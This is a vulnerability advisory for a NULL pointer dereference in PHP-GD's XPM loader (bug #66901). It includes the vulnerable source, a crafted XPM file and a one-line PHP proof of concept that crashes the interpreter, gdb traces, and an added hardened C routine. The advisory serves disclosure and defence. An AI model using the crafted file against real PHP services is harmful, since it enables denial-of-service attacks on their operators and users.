PHP-GD <= v5.4.17-2 c_color NULL pointer dereference

2014.03.17
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

Description:
------------
php-gd <= v5.4.17-2 'c_color' NULL pointer dereference. The bug is triggered in gdImageCreateFromXpm() on line 42 of gd/libgd/gdxpm.c:
---------------------------------------------------------------------------------
gdImagePtr gdImageCreateFromXpm (char *filename)
{
	XpmInfo info;
	XpmImage image;
	int i, j, k, number;
	char buf[5];
	gdImagePtr im = 0;
	int *pointer;
	int red = 0, green = 0, blue = 0;
	int *colors;
	int ret;

	ret = XpmReadFileToXpmImage(filename, &image, &info);
	if (ret != XpmSuccess) {
		return 0;
	}
	if (!(im = gdImageCreate(image.width, image.height))) {
		goto done;
	}
	number = image.ncolors;
	colors = (int *) safe_emalloc(number, sizeof(int), 0);
	for (i = 0; i < number; i++) {
		switch (strlen (image.colorTable[i].c_color)) { // BOOM
--------------------------------------------------------------------------------------------------------

The call to strlen() parses image.colorTable[i].c_color, which is initialised as NULL if the particular color mapping uses a different key (such as monochrome/monovisual).

The xpmColorKeys array stores all available keys and can be found in libXpm:
----------------------------------------------------------------------------
const char *xpmColorKeys[] = {
	"s",	/* key #1: symbol */
	"m",	/* key #2: mono visual */
	"g4",	/* key #3: 4 grays visual */
	"g",	/* key #4: gray visual */
	"c",	/* key #5: color visual */
};

The following xpm file will trigger the bug:
--------------------------------------------
/* XPM */
static char * gv_xpm[] = {
"13 13 6 1",
"A c #FFFFFF " /* "0" */,
"B c #CCCCCC " /* "0.0399" */,
"C c #999999 " /* "0.0798" */,
"D m #666666 " /* "0.12" NOTE: this is monochrome/monovisual */,
"E c #333333 " /* "0.16" */,
"F c #000000 " /* "0.2" */,
/* x-axis: 0 40 80 120 160 200 240 280 320 360 400 440 480 */
/* y-axis: 0 40 80 120 160 200 240 280 320 360 400 440 480 */
"FEDDDDCCCCCBA",
"FEDDDCCCCBBAB",
---------------------------------------------

POC:
php > imagecreatefromxpm("monochome-poc.xpm");

(gdb) p colorTable[0]
$2 = {string = 0x7fa6cec524c0 "A", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58650 "#FFFFFF"}
(gdb) p colorTable[1]
$3 = {string = 0x7fa6cec58670 "B", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58690 "#CCCCCC"}
(gdb) p colorTable[2]
$4 = {string = 0x7fa6cec586b0 "C", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec586d0 "#999999"}
(gdb) p colorTable[3]
$5 = {string = 0x7fa6cec586f0 "D", symbolic = 0x0, m_color = 0x7fa6cec58710 "#666666", g4_color = 0x0, g_color = 0x0, c_color = 0x0}
(gdb) p colorTable[4]
$6 = {string = 0x7fa6cec58730 "E", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58750 "#333333"}
(gdb) p colorTable[5]
$7 = {string = 0x7fa6cec58770 "F", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58790 "#000000"}
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
__strlen_sse2_pminub () at ../sysdeps/x86_64/multiarch/strlen-sse2-pminub.S:39
39	movdqu (%rdi), %xmm1
(gdb) bt
#0  __strlen_sse2_pminub () at ../sysdeps/x86_64/multiarch/strlen-sse2-pminub.S:39
#1  0x00007f009474942a in gdImageCreateFromXpm (filename=<optimized out>) at /usr/src/debug/php-5.4.17/ext/gd/libgd/gdxpm.c:42
#2  0x00007f009473d2c2 in _php_image_create_from (ht=<optimized out>, return_value=0x7f00a169be98, image_type=6, tn=0x7f0094753c00 "XPM", func_p=0x7f0094749340 <gdImageCreateFromXpm>, ioctx_func_p=<optimized out>, return_value_used=<optimized out>, this_ptr=<optimized out>, return_value_ptr=<optimized out>) at /usr/src/debug/php-5.4.17/ext/gd/gd.c:2534
#3  0x00007f00a19e5181 in zend_do_fcall_common_helper_SPEC (execute_data=0x7f00a1665060) at /usr/src/debug/php-5.4.17/Zend/zend_vm_execute.h:643
#4  0x00007f00a199f017 in execute (op_array=0x7f00a169acf8) at /usr/src/debug/php-5.4.17/Zend/zend_vm_execute.h:410
#5  0x00007f00a1932976 in zend_eval_stringl (str=str@entry=0x7f00a1699c88 "imagecreatefromxpm(\"0day/zero-day2.xpm\");\n", str_len=str_len@entry=42, retval_ptr=retval_ptr@entry=0x0, string_name=string_name@entry=0x7f00a1a0cbdf "php shell code") at /usr/src/debug/php-5.4.17/Zend/zend_execute_API.c:1197
#6  0x00007f00a181fcdf in readline_shell_run () at /usr/src/debug/php-5.4.17/ext/readline/readline_cli.c:664
#7  0x00007f00a19e78c4 in do_cli (argc=2, argv=0x7ffff35fc268) at /usr/src/debug/php-5.4.17/sapi/cli/php_cli.c:986
#8  0x00007f00a179ea9a in main (argc=2, argv=0x7ffff35fc268) at /usr/src/debug/php-5.4.17/sapi/cli/php_cli.c:1364

Test script:
---------------
/* XPM */
static char * gv_xpm[] = {
"13 13 6 1",
"A c #FFFFFF " /* "0" */,
"B c #CCCCCC " /* "0.0399" */,
"C c #999999 " /* "0.0798" */,
"D m #666666 " /* "0.12" NOTE: this is monochrome/monovisual */,
"E c #333333 " /* "0.16" */,
"F c #000000 " /* "0.2" */,
/* x-axis: 0 40 80 120 160 200 240 280 320 360 400 440 480 */
/* y-axis: 0 40 80 120 160 200 240 280 320 360 400 440 480 */
"FEDDDDCCCCCBA",
"FEDDDCCCCBBAB",

Expected result:
----------------
php > print imagecreatefromxpm("monochome-poc.xpm")."\n";
Resource id #4
php >

Actual result:
--------------
php > print imagecreatefromxpm("monochome-poc.xpm")."\n";
Segmentation fault (core dumped)
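The following is an added, illustrative hardened form of the colour-table loop above; it is not the PHP project's own fix for bug #66901. It models a libXpm colour entry with a stand-in struct (field names taken from the gdb output above), picks the first non-NULL key instead of passing c_color straight to strlen(), and as a simplification accepts only "#RRGGBB" specs, rejecting anything else rather than crashing.

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

/* Stand-in for libXpm's XpmColor: one pointer per key, keys absent from the
 * entry stay NULL. In the PoC above, entry "D" has only m_color set. */
typedef struct {
    const char *string;    /* pixel character(s) */
    const char *symbolic;  /* key "s", a name, not a colour spec */
    const char *m_color;   /* key "m"  */
    const char *g4_color;  /* key "g4" */
    const char *g_color;   /* key "g"  */
    const char *c_color;   /* key "c"  */
} XpmColorEntry;

/* The check gdxpm.c lacked: never hand a possibly-NULL key to strlen().
 * Falls back through the colour keys; NULL means no usable colour at all. */
static const char *xpm_pick_color(const XpmColorEntry *e)
{
    const char *keys[] = { e->c_color, e->g_color, e->g4_color, e->m_color };
    for (size_t i = 0; i < sizeof keys / sizeof keys[0]; i++)
        if (keys[i] != NULL)
            return keys[i];
    return NULL;
}

/* Parse "#RRGGBB" into rgb[0..2]; -1 on NULL, wrong length or non-hex digits. */
static int xpm_parse_rgb(const char *spec, int rgb[3])
{
    if (spec == NULL || strlen(spec) != 7 || spec[0] != '#')
        return -1;
    for (int i = 1; i < 7; i++)
        if (!isxdigit((unsigned char)spec[i])) return -1;
    unsigned long v = strtoul(spec + 1, NULL, 16);
    rgb[0] = (int)((v >> 16) & 0xff);
    rgb[1] = (int)((v >> 8) & 0xff);
    rgb[2] = (int)(v & 0xff);
    return 0;
}

/* Resolve every entry the way the gdImageCreateFromXpm loop does, but fail
 * closed: returns the number of entries resolved, or -1 at the first bad one. */
static int xpm_resolve_table(const XpmColorEntry *tab, int n, int rgb[][3])
{
    for (int i = 0; i < n; i++)
        if (xpm_parse_rgb(xpm_pick_color(&tab[i]), rgb[i]) != 0)
            return -1;
    return n;
}
```

With the PoC's six-entry table, entry "D" resolves through m_color to #666666 instead of dereferencing NULL; an entry with no colour key at all makes the whole table fail, which is the behaviour a loader should prefer over a crash.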

References:

https://bugs.php.net/bug.php?id=66901

